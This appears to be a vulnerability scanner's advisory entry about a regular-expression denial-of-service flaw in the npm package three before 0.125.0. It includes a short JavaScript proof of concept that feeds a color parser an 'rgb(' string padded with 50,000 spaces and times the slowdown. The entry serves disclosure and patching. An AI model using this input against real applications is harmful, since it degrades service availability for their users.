QID 982932
QID 982932: Nodejs (npm) Security Update for three (GHSA-fq6p-x6j3-cmmq)
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
Successful exploitation of this vulnerability may affect the confidentiality, integrity, and availability of the targeted user.
Solution
Customers are advised to refer to GHSA-fq6p-x6j3-cmmq for updates pertaining to this vulnerability.
Vendor References
- GHSA-fq6p-x6j3-cmmq -
github.com/advisories/GHSA-fq6p-x6j3-cmmq
CVEs related to QID 982932
Software Advisories
| Advisory ID | Software | Component | Link |
|---|---|---|---|
| GHSA-fq6p-x6j3-cmmq | three |
|